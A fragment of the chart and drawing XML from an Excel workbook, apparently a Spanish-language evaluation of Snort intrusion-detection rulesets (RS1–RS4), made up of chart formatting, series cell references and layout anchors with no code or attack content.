        <c:axId val="10198762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Nº DE INSTANCIAS DE ATAQUE PRINCIPAL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18113958"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="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DETALLADA POR TÉCNICA</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:scatterChart>
        <c:scatterStyle val="lineMarker"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$AV$11</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:xVal>
            <c:numRef>
              <c:f>'(D) - Resultados I'!$AS$12:$AS$87</c:f>
            </c:numRef>
          </c:xVal>
          <c:yVal>
            <c:numRef>
              <c:f>'(D) - Resultados I'!$AV$12:$AV$87</c:f>
              <c:numCache/>
            </c:numRef>
          </c:yVal>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$AX$11</c:f>
            </c:strRef>
          </c:tx>
          <c:spPr>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="7"/>
            <c:spPr>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:xVal>
            <c:numRef>
              <c:f>'(D) - Resultados I'!$AS$12:$AS$87</c:f>
            </c:numRef>
          </c:xVal>
          <c:yVal>
            <c:numRef>
              <c:f>'(D) - Resultados I'!$AX$12:$AX$87</c:f>
              <c:numCache/>
            </c:numRef>
          </c:yVal>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:axId val="287687536"/>
        <c:axId val="26461050"/>
      </c:scatterChart>
      <c:valAx>
        <c:axId val="28768753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DETECCIÓN SNORT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6461050"/>
      </c:valAx>
      <c:valAx>
        <c:axId val="26461050"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="1.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87687536"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>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SNORT (RS1)</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cat>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$H$144:$H$145</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados I'!$J$149:$J$150</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SNORT (RS2)</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cat>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$H$144:$H$145</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados I'!$L$149:$L$150</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SNORT (RS1)</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cat>
            <c:strRef>
              <c:f>'(D) - Resultados I'!$H$144:$H$145</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados I'!$N$149:$N$150</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PARA RS3</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Snort'!$M$27:$M$28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PARA RS4</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Snort'!$N$27:$N$28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PARA RS1</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Snort'!$R$27:$R$28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PARA RS2</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Snort'!$S$27:$S$28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PARA RS3</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Snort'!$T$27:$T$28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PARA RS4</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Snort'!$U$27:$U$28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EFECTIVIDAD ALERTAS POR RULESET</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:ln cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="6AA84F">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="14"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="6AA84F">
                    <a:alpha val="100000"/>
                  </a:srgbClr>
                </a:solidFill>
              </a:ln>
            </c:spPr>
          </c:marker>
          <c:dPt>
            <c:idx val="2"/>
            <c:marker>
              <c:symbol val="none"/>
            </c:marker>
          </c:dPt>
          <c:dLbls>
            <c:numFmt formatCode="General" sourceLinked="1"/>
            <c:txPr>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr lvl="0">
                  <a:defRPr b="1" sz="1600">
                    <a:solidFill>
                      <a:srgbClr val="000000"/>
                    </a:solidFill>
                  </a:defRPr>
                </a:pPr>
              </a:p>
            </c:txPr>
            <c:showLegendKey val="0"/>
            <c:showVal val="1"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="0"/>
            <c:showBubbleSize val="0"/>
          </c:dLbls>
          <c:trendline>
            <c:name>Línea de tendencia de serie 1</c:name>
            <c:spPr>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:ln>
            </c:spPr>
            <c:trendlineType val="linear"/>
            <c:dispRSqr val="1"/>
            <c:dispEq val="0"/>
          </c:trendline>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados II - Snort'!$Y$31:$AB$31</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados II - Snort'!$Y$48:$AB$48</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
          <c:smooth val="0"/>
        </c:ser>
        <c:axId val="1057135482"/>
        <c:axId val="349879293"/>
      </c:lineChart>
      <c:catAx>
        <c:axId val="10571354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49879293"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="3498792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57135482"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="r"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>
    <c:plotVisOnly val="1"/>
  </c:chart>
</c:chartSpace>
</file>

<file path=xl/charts/chartEx1.xml><?xml version="1.0" encoding="utf-8"?>
<cx:chartSpace xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:c14="http://schemas.microsoft.com/office/drawing/2007/8/2/chart">
  <cx:chartData>
    <cx:data id="0">
      <cx:numDim type="val">
        <cx:f dir="row">'(D) - Resultados II - Snort'!$C$10:$F$10</cx:f>
      </cx:numDim>
      <cx:strDim type="cat">
        <cx:f>'(D) - Resultados II - Snort'!$C$9:$F$9</cx:f>
      </cx:strDim>
    </cx:data>
  </cx:chartData>
  <cx:chart>
    <cx:plotArea>
      <cx:plotAreaRegion>
        <cx:series layoutId="waterfall" uniqueId="{717401E0-FA84-4CCF-879D-A4B085C4673C}">
          <cx:dataId val="0"/>
          <cx:layoutPr>
            <cx:visibility connectorLines="1"/>
            <cx:subtotals/>
          </cx:layoutPr>
        </cx:series>
      </cx:plotAreaRegion>
      <cx:axis id="0">
        <cx:catScaling gapWidth="auto"/>
        <cx:title>
          <cx:txPr>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr b="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr b="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t/>
              </a:r>
            </a:p>
          </cx:txPr>
        </cx:title>
        <cx:tickLabels/>
      </cx:axis>
      <cx:axis id="1">
        <cx:valScaling max="auto" min="auto"/>
        <cx:title>
          <cx:txPr>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr b="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:rPr b="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-lt"/>
                </a:rPr>
                <a:t/>
              </a:r>
            </a:p>
          </cx:txPr>
        </cx:title>
        <cx:majorGridlines>
          <cx:spPr>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="B7B7B7"/>
              </a:solidFill>
            </a:ln>
          </cx:spPr>
        </cx:majorGridlines>
        <cx:minorGridlines>
          <cx:spPr>
            <a:ln>
              <a:solidFill>
                <a:srgbClr val="CCCCCC">
                  <a:alpha val="0"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </cx:spPr>
        </cx:minorGridlines>
        <cx:tickLabels/>
      </cx:axis>
    </cx:plotArea>
  </cx:chart>
</cx:chartSpace>
</file>

<file path=xl/charts/colors1.xml><?xml version="1.0" encoding="utf-8"?>
<cs:colorStyle xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:cs="http://schemas.microsoft.com/office/drawing/2012/chartStyle" meth="cycle" id="10">
  <a:srgbClr val="4285F4"/>
  <a:srgbClr val="DB4437"/>
  <a:srgbClr val="BDBDBD"/>
</cs:colorStyle>
</file>

<file path=xl/charts/style1.xml><?xml version="1.0" encoding="utf-8"?>
<cs:chartStyle xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:cs="http://schemas.microsoft.com/office/drawing/2012/chartStyle" id="395">
  <cs:axisTitle>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:axisTitle>
  <cs:categoryAxis>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:categoryAxis>
  <cs:chartArea>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
    <cs:spPr>
      <a:solidFill>
        <a:srgbClr val="FFFFFF"/>
      </a:solidFill>
      <a:ln cap="flat" cmpd="sng" w="9525" algn="ctr">
        <a:solidFill>
          <a:srgbClr val="000000"/>
        </a:solidFill>
      </a:ln>
    </cs:spPr>
  </cs:chartArea>
  <cs:dataLabel>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dataLabel>
  <cs:dataLabelCallout>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dataLabelCallout>
  <cs:dataPoint>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0">
      <cs:styleClr val="isAuto"/>
    </cs:fillRef>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
    <cs:spPr>
      <a:solidFill>
        <a:schemeClr val="phClr"/>
      </a:solidFill>
    </cs:spPr>
  </cs:dataPoint>
  <cs:dataPoint3D>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dataPoint3D>
  <cs:dataPointLine>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dataPointLine>
  <cs:dataPointMarker>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dataPointMarker>
  <cs:dataPointWireframe>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dataPointWireframe>
  <cs:dataTable>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dataTable>
  <cs:downBar>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:downBar>
  <cs:dropLine>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:dropLine>
  <cs:errorBar>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:errorBar>
  <cs:floor>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:floor>
  <cs:gridlineMajor>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:gridlineMajor>
  <cs:gridlineMinor>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:gridlineMinor>
  <cs:hiLoLine>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:hiLoLine>
  <cs:leaderLine>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:leaderLine>
  <cs:legend>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:legend>
  <cs:plotArea>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:plotArea>
  <cs:plotArea3D>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:plotArea3D>
  <cs:seriesAxis>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:seriesAxis>
  <cs:seriesLine>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:seriesLine>
  <cs:title>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:title>
  <cs:trendline>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:trendline>
  <cs:trendlineLabel>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:trendlineLabel>
  <cs:upBar>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:upBar>
  <cs:valueAxis>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:valueAxis>
  <cs:wall>
    <cs:lnRef idx="0"/>
    <cs:fillRef idx="0"/>
    <cs:effectRef idx="0"/>
    <cs:fontRef idx="minor"/>
  </cs:wall>
</cs:chartStyle>
</file>

<file path=xl/drawings/_rels/drawing4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart19.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart10.xml"/><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2014/relationships/chartEx" Target="../charts/chartEx1.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart12.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart11.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9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart9.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart14.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart13.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart16.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart15.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart5.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart18.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart6.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart17.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart7.xml"/><Relationship Id="rId8"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0" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart29.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart20.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart21.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart22.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart23.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart28.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart24.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart25.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/chart" Target="../charts/chart26.xml"/><Relationship Id="rId8"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47625</xdr:colOff>
      <xdr:row>31</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="35337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47625</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>161925</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="353377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47625</xdr:colOff>
      <xdr:row>69</xdr:row>
      <xdr:rowOff>180975</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>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10</xdr:col>
      <xdr:colOff>47625</xdr:colOff>
      <xdr:row>89</xdr:row>
      <xdr:rowOff>180975</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="4" name="Chart 4"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15</xdr:col>
      <xdr:colOff>476250</xdr:colOff>
      <xdr:row>31</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="5" name="Chart 5"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15</xdr:col>
      <xdr:colOff>476250</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>161925</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="6" name="Chart 6"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15</xdr:col>
      <xdr:colOff>476250</xdr:colOff>
      <xdr:row>69</xdr:row>
      <xdr:rowOff>180975</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="7" name="Chart 7"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15</xdr:col>
      <xdr:colOff>476250</xdr:colOff>
      <xdr:row>89</xdr:row>
      <xdr:rowOff>180975</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="8" name="Chart 8"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23</xdr:col>
      <xdr:colOff>752475</xdr:colOff>
      <xdr:row>51</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5876925" cy="3752850"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="9" name="Chart 9"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xdr:col>
      <xdr:colOff>257175</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <mc:AlternateContent>
      <mc:Choice Requires="cx1">
        <xdr:graphicFrame>
          <xdr:nvGraphicFramePr>
            <xdr:cNvPr id="10" name="Chart 10" title="Gráfico"/>
            <xdr:cNvGraphicFramePr/>
          </xdr:nvGraphicFramePr>
          <xdr:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="0" cy="0"/>
          </xdr:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.microsoft.com/office/drawing/2014/chartex">
              <cx:chart r:id="rId10"/>
            </a:graphicData>
          </a:graphic>
        </xdr:graphicFrame>
      </mc:Choice>
      <mc:Fallback>
        <xdr:sp>
          <xdr:nvSpPr>
            <xdr:cNvPr id="1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chart isn't available in your version of Excel. Editing this shape or saving this workbook into a different file format will permanently break the chart.
</a:t>
              </a:r>
            </a:p>
          </xdr:txBody>
        </xdr:sp>
      </mc:Fallback>
    </mc:AlternateContent>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>304800</xdr:colOff>
      <xdr:row>34</xdr:row>
      <xdr:rowOff>66675</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="12" name="Chart 12" title="Gráfico"/>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1</xdr:col>
      <xdr:colOff>257175</xdr:colOff>
      <xdr:row>53</xdr:row>
      <xdr:rowOff>9525</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="13" name="Chart 13" title="Gráfico"/>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23</xdr:col>
      <xdr:colOff>752475</xdr:colOff>
      <xdr:row>74</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5876925" cy="3752850"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="14" name="Chart 14" title="Gráfico"/>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30</xdr:col>
      <xdr:colOff>2752725</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>47625</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="8315325" cy="5124450"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="15" name="Chart 15" title="Gráfico"/>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9</xdr:col>
      <xdr:colOff>1333500</xdr:colOff>
      <xdr:row>112</xdr:row>
      <xdr:rowOff>47625</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="6619875" cy="4095750"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="16" name="Chart 16" title="Gráfico"/>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9</xdr:col>
      <xdr:colOff>342900</xdr:colOff>
      <xdr:row>135</xdr:row>
      <xdr:rowOff>161925</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7610475" cy="4095750"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="17" name="Chart 17" title="Gráfico"/>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15</xdr:col>
      <xdr:colOff>476250</xdr:colOff>
      <xdr:row>112</xdr:row>
      <xdr:rowOff>47625</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="6619875" cy="4095750"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="18" name="Chart 18" title="Gráfico"/>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15</xdr:col>
      <xdr:colOff>476250</xdr:colOff>
      <xdr:row>135</xdr:row>
      <xdr:rowOff>161925</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7610475" cy="4095750"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="19" name="Chart 19" title="Gráfico"/>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6</xdr:col>
      <xdr:colOff>695325</xdr:colOff>
      <xdr:row>39</xdr:row>
      <xdr:rowOff>219075</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="20" name="Chart 20" title="Gráfico"/>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6</xdr:col>
      <xdr:colOff>742950</xdr:colOff>
      <xdr:row>58</xdr:row>
      <xdr:rowOff>47625</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="21" name="Chart 21" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId20"/>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1438275</xdr:colOff>
      <xdr:row>160</xdr:row>
      <xdr:rowOff>47625</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="22" name="Chart 22"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2505075</xdr:colOff>
      <xdr:row>160</xdr:row>
      <xdr:rowOff>47625</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="23" name="Chart 23"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27</xdr:col>
      <xdr:colOff>542925</xdr:colOff>
      <xdr:row>25</xdr:row>
      <xdr:rowOff>304800</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="6819900" cy="4210050"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="24" name="Chart 24"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1438275</xdr:colOff>
      <xdr:row>180</xdr:row>
      <xdr:rowOff>66675</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="25" name="Chart 25"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6</xdr:col>
      <xdr:colOff>2505075</xdr:colOff>
      <xdr:row>180</xdr:row>
      <xdr:rowOff>66675</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="26" name="Chart 26"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27</xdr:col>
      <xdr:colOff>1162050</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>19050</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="6819900" cy="4210050"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="27" name="Chart 27"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43</xdr:col>
      <xdr:colOff>952500</xdr:colOff>
      <xdr:row>87</xdr:row>
      <xdr:rowOff>342900</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="12725400" cy="5114925"/>
    <xdr:graphicFrame>
